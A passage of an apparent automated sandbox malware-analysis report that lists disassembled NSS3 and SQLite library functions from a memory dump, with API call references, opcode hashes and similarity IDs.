                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1886645929-0
                                                                                                                                              • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                              • Instruction ID: 045038d18f7157e9b3e3757dc5a5d9422d0e9111fa156f77bd76b1d1039698b5
                                                                                                                                              • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                              • Instruction Fuzzy Hash: 1D8138B06A25258BFB104E29CA903597ADADB70349F20A43ED91DCAFD3E774C494C60E
                                                                                                                                              Function 6C713C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C713C76
                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6C713C94
                                                                                                                                                • Part of subcall function 6C7095B0: TlsGetValue.KERNEL32(00000000,?,6C7200D2,00000000), ref: 6C7095D2
                                                                                                                                                • Part of subcall function 6C7095B0: EnterCriticalSection.KERNEL32(?,?,?,6C7200D2,00000000), ref: 6C7095E7
                                                                                                                                                • Part of subcall function 6C7095B0: PR_Unlock.NSS3(?,?,?,?,6C7200D2,00000000), ref: 6C709605
                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C713CB2
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C713CCA
                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C713CE1
                                                                                                                                                • Part of subcall function 6C713090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C72AE42), ref: 6C7130AA
                                                                                                                                                • Part of subcall function 6C713090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7130C7
                                                                                                                                                • Part of subcall function 6C713090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7130E5
                                                                                                                                                • Part of subcall function 6C713090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C713116
                                                                                                                                                • Part of subcall function 6C713090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C71312B
                                                                                                                                                • Part of subcall function 6C713090: PK11_DestroyObject.NSS3(?,?), ref: 6C713154
                                                                                                                                                • Part of subcall function 6C713090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C71317E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3167935723-0
                                                                                                                                              • Opcode ID: dbf01b1e9b4ea44d432f3459ab2aae7be1cd0f784a3e2f8136d43a096fe79991
                                                                                                                                              • Instruction ID: e6398f4d9dead3130cfc57302371d974a7a34a43e44bfc323283872d3ed29307
                                                                                                                                              • Opcode Fuzzy Hash: dbf01b1e9b4ea44d432f3459ab2aae7be1cd0f784a3e2f8136d43a096fe79991
                                                                                                                                              • Instruction Fuzzy Hash: 1561B5B1A04300ABEB105E65DE49FA776BDAF04748F4C8078FD099AE52F731D918C7A1
                                                                                                                                              Function 6C753D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C753440: PK11_GetAllTokens.NSS3 ref: 6C753481
                                                                                                                                                • Part of subcall function 6C753440: PR_SetError.NSS3(00000000,00000000), ref: 6C7534A3
                                                                                                                                                • Part of subcall function 6C753440: TlsGetValue.KERNEL32 ref: 6C75352E
                                                                                                                                                • Part of subcall function 6C753440: EnterCriticalSection.KERNEL32(?), ref: 6C753542
                                                                                                                                                • Part of subcall function 6C753440: PR_Unlock.NSS3(?), ref: 6C75355B
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C753D8B
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C753D9F
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C753DCA
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C753DE2
                                                                                                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C753E4F
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C753E97
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C753EAB
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C753ED6
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C753EEE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2554137219-0
                                                                                                                                              • Opcode ID: ec5aeac127be6aeb65f5a9c8901c06f5781a431fcc8de2d7ab2132dd12edbd73
                                                                                                                                              • Instruction ID: ff061320ae1769ee4a764b13fc62df91c5ca9770123f0cd641609f0cfcd0d0f0
                                                                                                                                              • Opcode Fuzzy Hash: ec5aeac127be6aeb65f5a9c8901c06f5781a431fcc8de2d7ab2132dd12edbd73
                                                                                                                                              • Instruction Fuzzy Hash: 42514771E002019FEB11AF69DE49B6A73F8AF45318F854178DE0947A22EF31E864CBD1
                                                                                                                                              Function 6C702C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_ZAlloc_Util.NSS3(20563F9C), ref: 6C702C5D
                                                                                                                                                • Part of subcall function 6C760D30: calloc.MOZGLUE ref: 6C760D50
                                                                                                                                                • Part of subcall function 6C760D30: TlsGetValue.KERNEL32 ref: 6C760D6D
                                                                                                                                              • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C702C8D
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C702CE0
                                                                                                                                                • Part of subcall function 6C702E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C702CDA,?,00000000), ref: 6C702E1E
                                                                                                                                                • Part of subcall function 6C702E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C702E33
                                                                                                                                                • Part of subcall function 6C702E00: TlsGetValue.KERNEL32 ref: 6C702E4E
                                                                                                                                                • Part of subcall function 6C702E00: EnterCriticalSection.KERNEL32(?), ref: 6C702E5E
                                                                                                                                                • Part of subcall function 6C702E00: PL_HashTableLookup.NSS3(?), ref: 6C702E71
                                                                                                                                                • Part of subcall function 6C702E00: PL_HashTableRemove.NSS3(?), ref: 6C702E84
                                                                                                                                                • Part of subcall function 6C702E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C702E96
                                                                                                                                                • Part of subcall function 6C702E00: PR_Unlock.NSS3 ref: 6C702EA9
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C702D23
                                                                                                                                              • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C702D30
                                                                                                                                              • CERT_MakeCANickname.NSS3(00000001), ref: 6C702D3F
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C702D73
                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6C702DB8
                                                                                                                                              • free.MOZGLUE ref: 6C702DC8
                                                                                                                                                • Part of subcall function 6C703E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C703EC2
                                                                                                                                                • Part of subcall function 6C703E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C703ED6
                                                                                                                                                • Part of subcall function 6C703E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C703EEE
                                                                                                                                                • Part of subcall function 6C703E60: PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C703F02
                                                                                                                                                • Part of subcall function 6C703E60: PL_FreeArenaPool.NSS3 ref: 6C703F14
                                                                                                                                                • Part of subcall function 6C703E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C703F27
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3941837925-0
                                                                                                                                              • Opcode ID: 0f5141a072f3e7fd5d39799386cec90768cdee1e41bccb5f187f48719e5cf76e
                                                                                                                                              • Instruction ID: cb994e7b5d94ef4b8fd978588da8294331ef4618e1588d0908030055a993c513
                                                                                                                                              • Opcode Fuzzy Hash: 0f5141a072f3e7fd5d39799386cec90768cdee1e41bccb5f187f48719e5cf76e
                                                                                                                                              • Instruction Fuzzy Hash: 7D51DEB2B042129BDB119E29DE8AB5B77E5EF84348F140439EC5983751EB31EC15CB92
                                                                                                                                              Function 6C707CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C7040D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C703F7F,?,00000055,?,?,6C701666,?,?), ref: 6C7040D9
                                                                                                                                                • Part of subcall function 6C7040D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C701666,?,?), ref: 6C7040FC
                                                                                                                                                • Part of subcall function 6C7040D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C701666,?,?), ref: 6C704138
                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C707CFD
                                                                                                                                                • Part of subcall function 6C7C9BF0: TlsGetValue.KERNEL32(?,?,?,6C810A75), ref: 6C7C9C07
                                                                                                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,6C829030), ref: 6C707D1B
                                                                                                                                                • Part of subcall function 6C75FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C701A3E,00000048,00000054), ref: 6C75FD56
                                                                                                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,6C829048), ref: 6C707D2F
                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C707D50
                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C707D61
                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6C707D7D
                                                                                                                                              • free.MOZGLUE(?), ref: 6C707D9C
                                                                                                                                              • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C707DB8
                                                                                                                                              • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C707E19
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 70581797-0
                                                                                                                                              • Opcode ID: 339946b029bd5e7d5ba5c571765c9e27ffdefa9011af83470b0aa05a5bd8c80c
                                                                                                                                              • Instruction ID: 683b21314a5bc0a4357cc56a2d43ecabd00d0af3d8f069203bb21ffa1a346837
                                                                                                                                              • Opcode Fuzzy Hash: 339946b029bd5e7d5ba5c571765c9e27ffdefa9011af83470b0aa05a5bd8c80c
                                                                                                                                              • Instruction Fuzzy Hash: C441E6B2B0011A9BDF009E699E4ABAF37E4AF5035CF050074EC19ABB51E730E955C7E1
                                                                                                                                              Function 6C6A7D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6A7E27
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6A7E67
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C6A7EED
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6A7F2E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 912837312-598938438
                                                                                                                                              • Opcode ID: d52a70442126236f669d538aa29c9fcc9d84cc6982b9d1c744fab6506b6d1416
                                                                                                                                              • Instruction ID: f934cb1a5310f45ec70ad8afe6eb488bc7752c5ef8b436400a870b9e9f4cb30d
                                                                                                                                              • Opcode Fuzzy Hash: d52a70442126236f669d538aa29c9fcc9d84cc6982b9d1c744fab6506b6d1416
                                                                                                                                              • Instruction Fuzzy Hash: 4761C274A042159FCB15CFA5C890BAA37B2BF86308F1449A8EC085BB56D730EC57CBE5
                                                                                                                                              Function 6C68FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C68FD7A
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68FD94
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C68FE3C
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68FE83
                                                                                                                                                • Part of subcall function 6C68FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C68FEFA
                                                                                                                                                • Part of subcall function 6C68FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C68FF3B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 1169254434-598938438
                                                                                                                                              • Opcode ID: c929f5957afb30fca6f0ac252e5ff473e91495b28d355a2835062c4a3dfb9fb9
                                                                                                                                              • Instruction ID: 8c1c24453451d4d476003430cf1dec909f119e780500c80e01100d425a0a8f77
                                                                                                                                              • Opcode Fuzzy Hash: c929f5957afb30fca6f0ac252e5ff473e91495b28d355a2835062c4a3dfb9fb9
                                                                                                                                              • Instruction Fuzzy Hash: 19519270A012159FCB04CF99C994AAEB7F1FF48308F144469EA05AB752E735EC51CBA5
                                                                                                                                              Function 6C718CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(00000000,00000000,?,6C72124D,00000001), ref: 6C718D19
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6C72124D,00000001), ref: 6C718D32
                                                                                                                                              • PL_ArenaRelease.NSS3(?,?,?,?,?,6C72124D,00000001), ref: 6C718D73
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C72124D,00000001), ref: 6C718D8C
                                                                                                                                                • Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
                                                                                                                                                • Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C72124D,00000001), ref: 6C718DBA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                              • String ID: KRAM$KRAM
                                                                                                                                              • API String ID: 2419422920-169145855
                                                                                                                                              • Opcode ID: baedbfb9f59fb870d91f60256db5a9de3a29d61986a1b8de68181c2ff33c5ac2
                                                                                                                                              • Instruction ID: def6ad55f5b6a3b37e1a3d91c8c216feb3e2775a3e99c10972b2f704448e6601
                                                                                                                                              • Opcode Fuzzy Hash: baedbfb9f59fb870d91f60256db5a9de3a29d61986a1b8de68181c2ff33c5ac2
                                                                                                                                              • Instruction Fuzzy Hash: AD2191B5A187018FCB40EF78C68655AB7F0FF59318F1A897AD89887B01DB34D842CB91
                                                                                                                                              Function 6C73ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C73ACE6
                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C73AD14
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C73AD23
                                                                                                                                                • Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C73AD39
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                              • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                                                                              • API String ID: 332880674-3521875567
                                                                                                                                              • Opcode ID: b058526410a79af40a8d08daf4cde5a8436a1055c74bcb6f2f9dba70f44ca2c4
                                                                                                                                              • Instruction ID: ba91096ebb8710047ad13aa67af530538cb319d778f51fedbfbfba61c3937249
                                                                                                                                              • Opcode Fuzzy Hash: b058526410a79af40a8d08daf4cde5a8436a1055c74bcb6f2f9dba70f44ca2c4
                                                                                                                                              • Instruction Fuzzy Hash: 5A2108306011249FDB219BA5DE4EB7A33B5AB4235EF442435E40D9BB02DB389848C7D6
                                                                                                                                              Function 6C7F1C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=ol,?,?,6C6F4E1D), ref: 6C7F1C8A
                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6C7F1CB6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                              • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=ol
                                                                                                                                              • API String ID: 1840970956-164381813
